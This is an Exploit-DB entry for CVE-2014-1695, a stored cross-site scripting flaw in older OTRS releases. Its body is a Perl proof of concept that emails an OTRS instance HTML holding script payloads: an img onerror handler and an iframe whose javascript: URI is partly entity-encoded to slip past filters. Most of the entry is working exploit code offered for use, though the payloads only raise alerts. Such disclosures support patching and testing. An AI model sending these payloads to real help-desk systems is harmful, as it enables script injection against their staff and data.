OTRS < 3.1.x & < 3.2.x & < 3.3.x - Stored Cross-Site Scripting XSS

2015-04-27T00:00:00
ID EDB-ID:36842
Type exploitdb
Reporter Adam Ziaja
Modified 2015-04-27T00:00:00

Description

OTRS < 3.1.x & < 3.2.x & < 3.3.x - Stored Cross-Site Scripting (XSS). CVE-2014-1695. Webapps exploit for php platform

                                        
                                            # Exploit Title: Stored Cross-Site Scripting (XSS) in OTRS
# Date: 28.01.2014
# Exploit Author: Adam Ziaja http://adamziaja.com
# Vendor Homepage: https://www.otrs.com
# Version: 3.1.x before 3.1.20, 3.2.x before 3.2.15, and 3.3.x before 3.3.5
# CVE : CVE-2014-1695

#!/usr/bin/perl -w
use strict;
use MIME::Lite;
my $msg = MIME::Lite-&gt;new(
    Subject =&gt; 'OTRS XSS PoC',
    From =&gt; 'attacker@example.com',
    To =&gt; 'otrs@example.com',
    Type =&gt; 'text/html',
    Data =&gt;
        '&lt;html&gt;&lt;body&gt;&lt;img/onerror="alert(\'XSS1\')"src=a&gt;&lt;iframe
src=javasc&#x72ipt:alert(\'XSS2\') &gt;&lt;/body&gt;&lt;/html&gt;'
);
$msg-&gt;send();